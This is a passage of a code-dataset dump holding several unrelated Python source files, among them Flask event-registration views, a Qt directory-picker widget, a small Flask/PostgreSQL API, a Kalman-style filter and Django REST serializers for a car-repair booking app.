current_user.unlike_comment(comment)\n db.session.commit()\n return redirect(request.referrer) \n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"484193449","text":"# [0, 1, 1, 2, 3, 5, 8, 13, 21]\n\n#added cache\ncache = {0:1, 1:1}\ndef rec_fib(n):\n #base cases\n # if n == 0:\n # return 0\n # if n == 1:\n # return 1\n if n in cache:\n return cache[n]\n \n #if it's not in the cache, we must :\n # run the recursion, and add to the cache\n cache[n] = rec_fib(n-1) + rec_fib(n-2)\n \n return rec_fib(n-1) + rec_fib(n-2)\n #here, calculation the same thing a bunch of times\n\nprint(rec_fib(5))\n\n","sub_path":"improving.py","file_name":"improving.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"220354655","text":"import collections\nimport datetime\nimport flask\nimport ops_web.db\nimport ops_web.email\nimport ops_web.tasks\nimport uuid\nimport zoneinfo\n\nfrom ops_web.ops_web import apm, app, db, login_required\n\n\nTimeZone = collections.namedtuple('TimeZone', ['display_name', 'tz_name'])\ntime_zones = [\n TimeZone('UTC-08:00 / US Pacific', 'America/Los_Angeles'),\n TimeZone('UTC-07:00 / US Mountain', 'America/Denver'),\n TimeZone('UTC-06:00 / US Central', 'America/Chicago'),\n TimeZone('UTC-05:00 / US Eastern', 'America/New_York'),\n TimeZone('UTC-03:00 / Brazil', 'America/Sao_Paulo'),\n TimeZone('UTC±00:00 / Western Europe', 'Europe/London'),\n TimeZone('UTC+01:00 / Ireland', 'Europe/Dublin'),\n TimeZone('UTC+01:00 / Central Europe', 'Europe/Paris'),\n TimeZone('UTC+02:00 / Eastern Europe', 'Africa/Cairo'),\n TimeZone('UTC+03:00 / Moscow', 'Europe/Moscow'),\n TimeZone('UTC+04:00 / United Arab Emirates', 'Asia/Dubai'),\n TimeZone('UTC+05:30 / India', 'Asia/Kolkata'),\n TimeZone('UTC+08:00 / Singapore', 'Asia/Singapore'),\n TimeZone('UTC+08:00 / China', 'Asia/Shanghai'),\n TimeZone('UTC+09:00 / Japan', 'Asia/Tokyo'),\n TimeZone('UTC+10:00 / Australia East [Melbourne]', 'Australia/Melbourne'),\n]\n\n\n@app.add_template_global\ndef gen_timezones():\n yield from time_zones\n\n\n@app.get('/events')\ndef events_redirect():\n return flask.redirect(flask.url_for('events_attend'))\n\n\n@app.get('/events/attend')\n@login_required\ndef events_attend():\n flask.g.events = _events_list_for_attend()\n return flask.render_template('events/attend.html')\n\n\n@app.get('/events/attend/')\n@login_required\ndef events_attend_detail(event_id: uuid.UUID):\n flask.g.employee = ops_web.db.employees.get(db, flask.g.email)\n flask.g.event = _events_get(event_id)\n if flask.g.event is None:\n return flask.abort(404)\n flask.g.event_time_zone = zoneinfo.ZoneInfo(flask.g.event.get('time_zone'))\n flask.g.event_datetime_aware = flask.g.event.get('happens_at').replace(tzinfo=flask.g.event_time_zone)\n flask.g.attendees = _event_registrations_list_for_event(event_id)\n flask.g.attendee_emails = [r.get('attendee_email') for r in flask.g.attendees]\n return flask.render_template('events/attend_detail.html')\n\n\n@app.post('/events/create')\n@login_required\ndef events_create():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n response = flask.redirect(flask.url_for('events_manage'))\n try:\n happens_at = datetime.datetime.strptime(flask.request.values.get('event-happens-at'), '%Y-%m-%dT%H:%M')\n except ValueError:\n app.logger.warning(f'event-happens-at was not a valid date')\n flask.flash('Invalid request', 'danger')\n return response\n try:\n max_attendees = int(flask.request.values.get('event-max-attendees', '0'))\n except ValueError:\n max_attendees = 0\n event_id = uuid.uuid4()\n params = {\n 'description': flask.request.values.get('event-description'),\n 'email': flask.g.email,\n 'event_id': event_id,\n 'happens_at': happens_at,\n 'limit_attendees': 'event-limit-attendees' in flask.request.values,\n 'location': flask.request.values.get('event-location'),\n 'max_attendees': max_attendees,\n 'registration_notes_template': flask.request.values.get('event-registration-notes-template'),\n 'time_zone': flask.request.values.get('event-timezone'),\n 'title': flask.request.values.get('event-title'),\n 'visible': 'event-visible' in flask.request.values,\n }\n _events_insert(**params)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Create event {event_id}')\n return response\n\n\n@app.post('/events/delete')\n@login_required\ndef events_delete():\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n if event is not None and flask.g.email in event.get('managers'):\n _events_delete(event_id)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Delete event {event_id}')\n return flask.redirect(flask.url_for('events_manage'))\n\n\n@app.get('/events/manage')\n@login_required\ndef events_manage():\n flask.g.events = _events_list_for_manage(flask.g.email)\n flask.g.event = {}\n return flask.render_template('events/manage.html')\n\n\n@app.get('/events/manage/')\n@login_required\ndef events_manage_detail(event_id: uuid.UUID):\n flask.g.event = _events_get(event_id)\n if flask.g.event is None or flask.g.email not in flask.g.event.get('managers'):\n return flask.abort(404)\n flask.g.event_time_zone = zoneinfo.ZoneInfo(flask.g.event.get('time_zone'))\n flask.g.event_datetime_aware = flask.g.event.get('happens_at').replace(tzinfo=flask.g.event_time_zone)\n flask.g.attendees = _event_registrations_list_for_event(event_id)\n flask.g.employee_emails = ops_web.db.employees.list_emails(db)\n return flask.render_template('events/manage_detail.html')\n\n\n@app.post('/events/register')\n@login_required\ndef events_register():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n\n if event is None:\n flask.flash('The event you are trying to register for does not exist.', 'danger')\n return flask.redirect(flask.url_for('events_attend'))\n\n event_detail_page = flask.redirect(flask.url_for('events_attend_detail', event_id=event_id))\n\n if flask.g.email in event.get('attendees'):\n flask.flash('You are already registered to attend this event.', 'warning')\n return event_detail_page\n\n if event.get('limit_attendees') and event.get('attendee_count') >= event.get('max_attendees'):\n flask.flash('Registration for this event is full.', 'danger')\n return event_detail_page\n\n params = {\n 'attendee_email': flask.g.email,\n 'attendee_job_title': flask.request.values.get('attendee-job-title'),\n 'attendee_location': flask.request.values.get('attendee-location'),\n 'attendee_name': flask.request.values.get('attendee-name'),\n 'attendee_notes': flask.request.values.get('attendee-notes'),\n 'event_id': event_id,\n }\n _event_registrations_upsert(**params)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Register for event {event_id}')\n ops_web.tasks.scheduler.add_job(task_new_event_registration, args=[event_id, flask.g.email])\n flask.flash('You successfully registered to attend this event.', 'success')\n return event_detail_page\n\n\n@app.post('/events/unregister')\n@login_required\ndef events_unregister():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n if event is None:\n flask.flash('The event you are trying to cancel register for does not exist.', 'danger')\n return flask.redirect(flask.url_for('events_attend'))\n _event_registrations_delete(event_id, flask.g.email)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Unregister for event {event_id}')\n flask.flash('You canceled your registration for this event.', 'success')\n return flask.redirect(flask.url_for('events_attend_detail', event_id=event_id))\n\n\n@app.post('/events/update')\n@login_required\ndef events_update():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n\n if event is None:\n flask.flash('The event you are trying to update does not exist.', 'danger')\n return flask.redirect(flask.url_for('events_attend'))\n\n event_detail_page = flask.redirect(flask.url_for('events_manage_detail', event_id=event_id))\n if flask.g.email not in event.get('managers'):\n flask.flash('You do not have permission to update this event.', 'danger')\n return event_detail_page\n\n try:\n happens_at = datetime.datetime.strptime(flask.request.values.get('event-happens-at'), '%Y-%m-%dT%H:%M')\n except ValueError:\n app.logger.warning(f'event-happens-at was not a valid date')\n flask.flash('Invalid request.', 'danger')\n return event_detail_page\n\n try:\n max_attendees = int(flask.request.values.get('event-max-attendees', '0'))\n except ValueError:\n max_attendees = 0\n params = {\n 'description': flask.request.values.get('event-description'),\n 'event_id': event_id,\n 'happens_at': happens_at,\n 'limit_attendees': 'event-limit-attendees' in flask.request.values,\n 'location': flask.request.values.get('event-location'),\n 'max_attendees': max_attendees,\n 'registration_notes_template': flask.request.values.get('event-registration-notes-template'),\n 'time_zone': flask.request.values.get('event-timezone'),\n 'title': flask.request.values.get('event-title'),\n 'visible': 'event-visible' in flask.request.values,\n }\n _events_update(**params)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Update details for event {event_id}')\n return event_detail_page\n\n\n@app.post('/events/update-managers')\n@login_required\ndef events_update_managers():\n for k, v in flask.request.values.lists():\n app.logger.debug(f'{k}: {v}')\n event_id = flask.request.values.get('event-id')\n event = _events_get(event_id)\n\n if event is None:\n flask.flash('The event you are trying to update does not exist.', 'danger')\n return flask.redirect(flask.url_for('events_attend'))\n\n event_detail_page = flask.redirect(flask.url_for('events_manage_detail', event_id=event_id))\n if flask.g.email not in event.get('managers'):\n flask.flash('You do not have permission to update this event.', 'danger')\n return event_detail_page\n\n emails = set(flask.request.values.getlist('managers'))\n emails.add(flask.g.email)\n _event_managers_update(event_id, emails)\n ops_web.db.log_entries.insert(db, flask.g.email, f'Set event {event_id} managers to {emails}')\n\n return event_detail_page\n\n\ndef task_new_event_registration(event_id: uuid.UUID, attendee_email: str):\n apm.client.begin_transaction('task')\n er = _event_registrations_get(event_id, attendee_email)\n with app.app_context():\n body = flask.render_template('email/events-new-registration.html', ctx=er)\n recipients = ','.join([f'<{email}>' for email in er.get('event_manager_emails')])\n event_title = er.get('event_title')\n subject = f'[Ops Web] New registration for your event: {event_title}'\n m = ops_web.email.build_email(recipients, subject, body)\n s = ops_web.db.Settings(db)\n ops_web.email.send_email(s, m)\n apm.client.end_transaction('events-notify-new-registration')\n\n\ndef _event_managers_update(event_id: uuid.UUID, emails: set[str]):\n sql = '''\n delete from event_managers\n where event_id = %(event_id)s\n '''\n params = {\n 'event_id': event_id,\n }\n db.u(sql, params)\n sql = '''\n insert into event_managers (event_id, email) values (%(event_id)s, %(email)s)\n '''\n records = [\n {'event_id': event_id, 'email': e}\n for e in emails\n ]\n db.b(sql, records)\n\n\ndef _event_registrations_delete(event_id: uuid.UUID, email: str):\n sql = '''\n delete from event_registrations\n where event_id = %(event_id)s and attendee_email = %(attendee_email)s\n '''\n params = {\n 'attendee_email': email,\n 'event_id': event_id,\n }\n db.u(sql, params)\n\n\ndef _event_registrations_get(event_id: uuid.UUID, attendee_email: str) -> dict:\n sql = '''\n with m as (\n select event_id, array_agg(email order by email) event_manager_emails\n from event_managers\n group by event_id\n )\n select\n r.attendee_email, r.attendee_job_title, r.attendee_location, r.attendee_name, r.attendee_notes, r.event_id,\n m.event_manager_emails, e.title event_title\n from event_registrations r\n left join events e on e.event_id = r.event_id\n left join m on m.event_id = r.event_id\n where r.event_id = %(event_id)s and r.attendee_email = %(attendee_email)s\n '''\n params = {\n 'attendee_email': attendee_email,\n 'event_id': event_id,\n }\n return db.q_one(sql, params)\n\n\ndef _event_registrations_list_for_event(event_id: uuid.UUID) -> list[dict]:\n sql = '''\n select\n attendee_email, attendee_job_title, attendee_location, attendee_name, attendee_notes, event_id\n from event_registrations r\n where r.event_id = %(event_id)s\n order by attendee_name, attendee_email\n '''\n params = {\n 'event_id': event_id,\n }\n return db.q(sql, params)\n\n\ndef _event_registrations_upsert(**kwargs):\n sql = '''\n insert into event_registrations (\n attendee_email, attendee_job_title, attendee_location, attendee_name, attendee_notes,\n event_id\n ) values (\n %(attendee_email)s, %(attendee_job_title)s, %(attendee_location)s, %(attendee_name)s, %(attendee_notes)s,\n %(event_id)s\n ) on conflict (event_id, attendee_email) do update set\n attendee_job_title = %(attendee_job_title)s, attendee_location = %(attendee_location)s,\n attendee_name = %(attendee_name)s, attendee_notes = %(attendee_notes)s\n '''\n db.u(sql, kwargs)\n\n\ndef _events_delete(event_id: uuid.UUID):\n sql = '''\n delete from events where event_id = %(event_id)s\n '''\n params = {\n 'event_id': event_id\n }\n db.u(sql, params)\n\n\ndef _events_get(event_id: uuid.UUID) -> dict:\n sql = '''\n with a as (\n select event_id, array_agg(attendee_email order by attendee_email) attendees, count(*) attendee_count\n from event_registrations\n group by event_id\n ), m as (\n select event_id, array_agg(email order by email) managers\n from event_managers\n group by event_id\n )\n select\n coalesce(a.attendee_count, 0) as attendee_count, coalesce(a.attendees, '{}') as attendees, e.description,\n e.event_id, e.happens_at, e.limit_attendees, e.location, m.managers, e.max_attendees,\n coalesce(e.registration_notes_template, '') as registration_notes_template, e.time_zone, e.title, e.visible\n from events e\n left join a on a.event_id = e.event_id\n left join m on m.event_id = e.event_id\n where e.event_id = %(event_id)s\n '''\n params = {\n 'event_id': event_id,\n }\n return db.q_one(sql, params)\n\n\ndef _events_insert(**kwargs):\n sql = '''\n insert into events (\n description, event_id, happens_at, limit_attendees, location, max_attendees,\n registration_notes_template, time_zone, title, visible\n ) values (\n %(description)s, %(event_id)s, %(happens_at)s, %(limit_attendees)s, %(location)s, %(max_attendees)s,\n %(registration_notes_template)s, %(time_zone)s, %(title)s, %(visible)s\n ) \n '''\n db.u(sql, kwargs)\n sql = '''\n insert into event_managers (event_id, email) values (%(event_id)s, %(email)s) on conflict do nothing\n '''\n db.u(sql, kwargs)\n\n\ndef _events_list_for_attend() -> list[dict]:\n sql = '''\n with a as (\n select event_id, count(*) attendee_count\n from event_registrations\n group by event_id\n )\n select\n coalesce(a.attendee_count, 0) as attendee_count, e.description, e.event_id, e.happens_at, e.limit_attendees,\n e.location, e.max_attendees, e.time_zone, e.title\n from events e\n left join a on a.event_id = e.event_id\n where e.visible is true\n and e.happens_at at time zone e.time_zone > current_timestamp\n order by e.title, e.happens_at\n '''\n return db.q(sql)\n\n\ndef _events_list_for_manage(email: str) -> list[dict]:\n sql = '''\n with a as (\n select event_id, count(*) attendee_count\n from event_registrations\n group by event_id\n )\n select\n coalesce(a.attendee_count, 0) as attendee_count, e.event_id, e.happens_at, e.limit_attendees, e.location,\n e.max_attendees, e.time_zone, e.title, e.visible\n from events e\n left join a on a.event_id = e.event_id\n left join event_managers m on m.event_id = e.event_id\n where m.email = %(email)s\n order by e.title, e.happens_at\n '''\n params = {\n 'email': email,\n }\n return db.q(sql, params)\n\n\ndef _events_update(**kwargs):\n sql = '''\n update events set\n description = %(description)s, happens_at = %(happens_at)s, limit_attendees = %(limit_attendees)s,\n location = %(location)s, max_attendees = %(max_attendees)s,\n registration_notes_template = %(registration_notes_template)s, time_zone = %(time_zone)s, title = %(title)s,\n visible = %(visible)s\n where event_id = %(event_id)s\n '''\n db.u(sql, kwargs)\n","sub_path":"ops_web/views/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":17153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65060138","text":"import os\nimport sys\nimport logging\n\nfrom soma.qt_gui.qt_backend import QtGui, QtCore\nfrom soma.qt_gui import qt_backend\nfrom .File import FileControlWidget\n\nif sys.version_info[0] >= 3:\n unicode = str\n\n\nclass DirectoryControlWidget(FileControlWidget):\n\n \"\"\" Control to enter a directory.\n \"\"\"\n\n @staticmethod\n def is_valid(control_instance, *args, **kwargs):\n \"\"\" Method to check if the new control value is correct.\n\n If the new entered value is not correct, the backroung control color\n will be red.\n\n Parameters\n ----------\n control_instance: QWidget (mandatory)\n the control widget we want to validate\n\n Returns\n -------\n out: bool\n True if the control value is a file,\n False otherwise\n \"\"\"\n # Get the current control palette\n control_palette = control_instance.path.palette()\n\n # Get the control current value\n control_value = control_instance.path.text()\n\n # If the control value contains a file, the control is valid and the\n # backgound color of the control is white\n is_valid = False\n if os.path.isdir(control_value) \\\n or (control_instance.output and control_value != \"\"):\n control_palette.setColor(\n control_instance.path.backgroundRole(), QtCore.Qt.white)\n is_valid = True\n\n # If the control value is optional, the control is valid and the\n # backgound color of the control is yellow\n elif control_instance.optional is True and control_value == \"\":\n control_palette.setColor(\n control_instance.path.backgroundRole(), QtCore.Qt.yellow)\n is_valid = True\n\n # If the control value is empty, the control is not valid and the\n # backgound color of the control is red\n else:\n control_palette.setColor(\n control_instance.path.backgroundRole(), QtCore.Qt.red)\n\n # Set the new palette to the control instance\n control_instance.path.setPalette(control_palette)\n\n return is_valid\n\n #\n # Callbacks\n #\n\n @staticmethod\n def onBrowseClicked(control_instance):\n \"\"\" Browse the file system and update the control instance accordingly.\n\n If a valid direcorty has already been entered the dialogue will\n automatically point to this folder, otherwise the current working\n directory is used.\n\n Parameters\n ----------\n control_instance: QWidget (mandatory)\n the directory widget item\n \"\"\"\n # Get the current directory\n current_control_value = os.path.join(os.getcwd(), os.pardir)\n if DirectoryControlWidget.is_valid(control_instance):\n current_control_value = unicode(control_instance.path.text())\n\n # Create a dialogue to select a directory\n folder = qt_backend.getExistingDirectory(\n control_instance, \"Open directory\", current_control_value,\n QtGui.QFileDialog.ShowDirsOnly\n | QtGui.QFileDialog.DontUseNativeDialog)\n\n # Set the selected directory to the path sub control\n control_instance.path.setText(unicode(folder))\n","sub_path":"python/soma/qt_gui/controls/Directory.py","file_name":"Directory.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156313304","text":"import os\n\nimport psycopg2\nfrom flask import Flask, request\nfrom werkzeug.exceptions import HTTPException\nfrom werkzeug.middleware.dispatcher import DispatcherMiddleware\n\nDATABASE_URL = os.environ.get(\"DATABASE_URL\")\nSCHEMA_NAME = os.environ.get(\"SCHEMA_NAME\", \"public\")\nconn = psycopg2.connect(DATABASE_URL, options=f\"-c search_path={SCHEMA_NAME}\")\n\nroot = Flask(__name__)\n\n\n@root.errorhandler(Exception)\ndef handle_exception(e):\n if isinstance(e, HTTPException):\n return e\n return str(e), 500\n\n\n@root.route(\"/\")\ndef entry():\n return \"OK\"\n\n\ndef query_db(query, args=(), one=False):\n with conn:\n with conn.cursor() as curs:\n curs.execute(query, args)\n r = [\n dict((curs.description[i][0], value) for i, value in enumerate(row))\n for row in curs.fetchall()\n ]\n return (r[0] if r else None) if one else r\n\n\n@root.route(\"/doctor\", methods=[\"POST\"])\ndef create_doctor():\n doctor = request.get_json()\n return query_db(\n \"INSERT INTO doctor (name, email, tags) VALUES (%s, %s, %s) RETURNING id\",\n (doctor[\"name\"], doctor[\"email\"], doctor[\"tags\"]),\n one=True,\n )\n\n\n@root.route(\"/doctor/\", methods=[\"GET\"])\ndef get_doctor(doctor_id):\n return query_db(\"SELECT * FROM doctor WHERE id = %s\", (doctor_id,), one=True)\n\n\n@root.route(\"/post\", methods=[\"POST\"])\ndef create_post():\n post = request.get_json()\n return query_db(\n \"INSERT INTO post (owner, tags, content) VALUES (%s, %s, %s) RETURNING id\",\n (post[\"owner\"], post[\"tags\"], post[\"content\"]),\n one=True,\n )\n\n\n@root.route(\"/post\", methods=[\"PUT\"])\ndef reply_post():\n reply = request.get_json()\n reply_id = query_db(\n \"INSERT INTO post (owner, tags, content) VALUES (%s, %s, %s) RETURNING id\",\n (reply[\"owner\"], \"{}\", reply[\"content\"]),\n one=True,\n )\n query_db(\n \"UPDATE post SET replied = array_append(replied, %s) WHERE id = %s RETURNING id\",\n (reply_id[\"id\"], reply[\"post\"]),\n one=True,\n )\n return reply_id\n\n\n@root.route(\"/post/\", methods=[\"GET\"])\ndef get_post(post_id):\n return query_db(\n \"SELECT * FROM post WHERE id = %s\",\n (post_id,),\n one=True,\n )\n\n\n@root.route(\"/attachment\", methods=[\"POST\"])\ndef create_attachment():\n pass\n\n\napp = DispatcherMiddleware(root)\n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"631083164","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\tpath('', views.home, name = 'home'),\n\tpath('shape/', views.shape, name = 'shape'),\n\tpath('change_shape/', views.change_shape, name = 'change-shape'),\n\tpath('circle_settings/', views.circle_settings, name = 'circle-settings'),\n\tpath('colours/', views.colours, name = 'colours'),\n\tpath('grid_settings/', views.grid_settings, name = 'grid-settings'),\n\tpath('line_settings/', views.line_settings, name = 'line-settings'),\n\tpath('square_settings/', views.square_settings, name = 'square-settings'),\n\t]","sub_path":"LEDApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439494052","text":"import scipy as sp\nfrom scipy import transpose as t\nfrom scipy.linalg import inv\n\ndef rsk_filter(ymeans,\n transition_matrix,\n translation_matrix,\n group_count_matrix,\n sigma,\n a0,\n Q0,\n Q,\n n_groups\n ):\n\n n_periods, n_vars = ymeans.shape\n\n # alpha hidden layer setup\n n_alpha = len(a0)\n alpha = sp.zeros((n_periods+1, n_alpha))\n alpha_filter = sp.zeros((n_periods+1, n_alpha))\n alpha_filter[0] = a0\n\n # V covariance setup\n V = sp.zeros((n_periods + 1, n_alpha, n_alpha))\n V_filter = sp.zeros((n_periods+1, n_alpha, n_alpha))\n V_filter[0]= Q0\n\n # group count/variance factor\n n_sigma_inv = n_groups*inv(sigma)\n\n for i in range(1, n_periods+1):\n # predict\n alpha[i] = transition_matrix.dot(alpha_filter[i-1, :])\n V[i] = transition_matrix.dot(V_filter[i-1, :]).dot(t(transition_matrix)) + Q\n\n # update\n V_filter[i] = inv(sp.linalg.inv(V[i]) + t(translation_matrix).dot(n_sigma_inv).dot(translation_matrix))\n alpha_filter[i] = alpha[i] + V_filter[i].dot(t(translation_matrix)).dot(n_sigma_inv).dot(ymeans[i - 1] - translation_matrix.dot(alpha[i]))\n\n return alpha, V, alpha_filter, V_filter\n\n\n","sub_path":"rsk/rsk.py","file_name":"rsk.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426661613","text":"from django.db.models import Prefetch\nfrom rest_framework import serializers\n\nfrom core.models import EntityChangeTracker\nfrom core.models.booking import (\n Booking,\n BookingPackage,\n BookingPackagePanel,\n BookingAddress,\n BookingCheckpoint,\n BookingImage,\n BookingDiscount,\n BookingCoupon,\n BookingFeedback,\n BookingCustFeedback,\n BookingProformaInvoice,\n BookingInvoice,\n BookingReworkPackage,\n BookingReworkPackagePanel,\n BookingQualityChecks,\n TeamAlert,\n BookingHandoverItem,\n BookingChecklist,\n BookingFlag,\n BookingPartDoc,\n BookingPartQuote,\n PartDocNote,\n PartQuoteNote,\n BookingExpectedEOD\n)\nfrom core.constants import ACTION_DICT\nfrom core.models.users import Followup, CreditTransaction\nfrom core.models.payment import Payment\nfrom core.models.message import Messages\nfrom core.models.master import PackagePrice, BookingStatus, City, Package, BookingOpsStatus, CarPanelPrice, \\\n CarReturnReasons, FlagType, PartDocStatus, PartVendor\nfrom masterSerializers import (\n PackagePriceSerializer,\n CarPanelPriceSerializer,\n WorkshopSerializer,\n PackageSerializer,\n CarPanelSerializer,\n QualityCheckSerializer,\n TeamAlertReasonSerializer,\n HandoverItemSerializer,\n DelayReasonsSerializer,\n ChecklistItemSerializer,\n ReturnReasonsSerializer,\n DiscountReasonsSerializer,\n FlagTypeSerializer,\n GenericModelSerializer\n)\nfrom commonSerializers import AddressSerializer, DynamicFieldsModelSerializer, MediaSerializer\nfrom core.managers import bookingManager,paymentManager\nfrom userSerializer import UserSerializer, UserCarSerializer, FollowupSerializer\nfrom commonSerializers import ConflictAwareModelSerializer\nfrom custom_serializer_fields import CreateListModelMixin, ObjectUserValidator\nfrom django.contrib.auth import get_user_model\nfrom decimal import Decimal\nfrom django.conf import settings\nfrom core.tasks import send_custom_notification_task\nfrom django.utils import timezone\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass TestedQualityCheckSerializer(serializers.ModelSerializer):\n # quality_check_id = serializers.IntegerField(required=True)\n # is_passed = serializers.BooleanField(required=True)\n # failure_reason = serializers.CharField(max_length=1024, required=False)\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n class Meta:\n model = BookingQualityChecks\n exclude = ('booking', 'booking_image')\n\n\nclass BookingHandoverItemCreateSerializer(serializers.ModelSerializer):\n # group = serializers.IntegerField(\n # read_only=True,\n # default=serializers.CreateOnlyDefault(bookingManager.get_handover_group)\n # )\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n class Meta:\n model = BookingHandoverItem\n exclude = ('booking',)\n extra_kwargs = {'status': {'required': False},'ops_status': {'required': False}}\n\n\nclass BookingChecklistItemCreateSerializer(serializers.ModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n media = serializers.ListField(child=MediaSerializer(remove_fields=['media_type', 'desc']), required=False)\n\n class Meta:\n model = BookingChecklist\n exclude = ('booking',)\n extra_kwargs = {'status': {'required': False},'ops_status': {'required': False}}\n\n\nclass BookingPackagePanelSerializer(ConflictAwareModelSerializer):\n panel_details = CarPanelPriceSerializer(source='panel', remove_fields=['city'], read_only=True)\n price = serializers.SerializerMethodField()\n price_text = serializers.SerializerMethodField()\n # rework_panel = BookingReworkPackagePanelSerializer(many=True, read_only=True,\n # remove_fields=['booking_package_panel',\n # 'panel_details'])\n\n class Meta:\n model = BookingPackagePanel\n fields = ('id','booking_package','panel_details','panel','price',\n 'part_price','material_price','labour_price','rework','price_text', 'extra')\n\n def get_price(self,obj):\n price = bookingManager.get_booking_package_panel_price(obj)\n return str(price)\n\n def get_price_text(self, obj):\n price = bookingManager.get_booking_package_panel_price(obj)\n if obj.panel.type_of_work in [CarPanelPrice.TYPE_OF_WORK_REPLACE, CarPanelPrice.TYPE_OF_WORK_REPLACE_FBB]:\n if obj.part_price is None and obj.material_price is None and obj.labour_price is None:\n return \"Part MRP*\"\n elif obj.part_price is None:\n return \"₹ \" + str(int(price)) + \" + Part MRP*\"\n return \"₹ \" + str(price)\n\n def create(self, validated_data):\n booking_package = validated_data.get('booking_package')\n if booking_package.booking.status.flow_order_num >= 15:\n raise serializers.ValidationError(\"Cannot add panel after Work Completed.\")\n if booking_package.booking.rework_booking_id is not None:\n panel = validated_data.get('panel')\n extra = validated_data.get('extra')\n if panel and not extra:\n validated_data['part_price'] = 0\n validated_data['material_price'] = 0\n validated_data['labour_price'] = 0\n return super(BookingPackagePanelSerializer,self).create(validated_data)\n\n def update(self, instance, validated_data):\n booking = instance.booking_package.booking\n if booking.status.flow_order_num >= 15:\n raise serializers.ValidationError(\"Cannot update package after Work Completed.\")\n\n if validated_data.get('part_price') or validated_data.get('material_price') or \\\n validated_data.get('labour_price'):\n if not instance.panel.editable:\n raise serializers.ValidationError(\"Price not editable for for this panel/part.\")\n\n extra = validated_data.get('extra')\n if not extra:\n extra = instance.extra\n if booking.rework_booking_id is not None and not extra:\n validated_data['part_price'] = 0\n validated_data['material_price'] = 0\n validated_data['labour_price'] = 0\n else:\n if validated_data.get('part_price') or validated_data.get('material_price') or \\\n validated_data.get('labour_price'):\n pass\n else:\n instance.part_price = None\n instance.material_price = None\n instance.labour_price = None\n\n return super(BookingPackagePanelSerializer,self).update(instance, validated_data)\n\n\nclass BookingPackageSerializer(DynamicFieldsModelSerializer):\n package = PackagePriceSerializer(remove_fields=['city'], read_only=True)\n package_id = serializers.PrimaryKeyRelatedField(queryset=PackagePrice.objects.all(),\n source='package', write_only=True)\n booking_package_panel = BookingPackagePanelSerializer(remove_fields=['booking_package'],\n many=True, required=False)\n manual_price = serializers.DecimalField(max_digits=10,decimal_places=2,write_only=True,required=False)\n price = serializers.SerializerMethodField()\n #service_tax = serializers.SerializerMethodField()\n #vat = serializers.SerializerMethodField()\n # rework_package = BookingReworkPackageSerializer(many=True, read_only=True,\n # remove_fields=['booking_package',\n # 'booking_package_details'])\n\n class Meta:\n model = BookingPackage\n fields = ('id','package','booking','package_id','booking_package_panel',\n 'price','manual_price',\n 'part_price','material_price','labour_price',\n 'rework', 'extra'\n )\n\n def get_price(self,obj):\n price = Decimal('0.00')\n if obj.package.package.category == Package.CATEGORY_DENT:\n for panel in obj.booking_package_panel.all():\n price += bookingManager.get_booking_package_panel_price(panel)\n else:\n price = bookingManager.get_booking_package_price(obj)\n return str(price)\n\n # def get_service_tax(self,obj):\n # service_tax = Decimal('0.00')\n # if obj.package.package.category == Package.CATEGORY_DENT:\n # for panel in obj.booking_package_panel.all():\n # service_tax += bookingManager.get_booking_package_panel_service_tax(panel)\n # else:\n # service_tax = obj.service_tax\n # return str(service_tax)\n\n # def get_vat(self,obj):\n # vat = Decimal('0.00')\n # if obj.package.package.category == Package.CATEGORY_DENT:\n # for panel in obj.booking_package_panel.all():\n # vat += bookingManager.get_booking_package_panel_vat(panel)\n # else:\n # vat = obj.vat\n # return str(vat)\n\n def create(self, validated_data):\n booking = validated_data.get('booking')\n if booking.status.flow_order_num >= 15:\n raise serializers.ValidationError(\"Cannot add package after Work Completed.\")\n bp_panels = validated_data.pop('booking_package_panel',[])\n validated_data['price'] = validated_data.pop('manual_price',None)\n\n extra = validated_data.get('extra')\n if booking.rework_booking_id is not None and not extra:\n validated_data['part_price'] = 0\n validated_data['material_price'] = 0\n validated_data['labour_price'] = 0\n\n bp_obj = BookingPackage.objects.create(**validated_data)\n if bp_obj.package.package.category == Package.CATEGORY_DENT:\n for bp_panel in bp_panels:\n extra = bp_panel.get('extra')\n if booking.rework_booking_id is not None and not extra:\n bp_panel['part_price'] = 0\n bp_panel['material_price'] = 0\n bp_panel['labour_price'] = 0\n 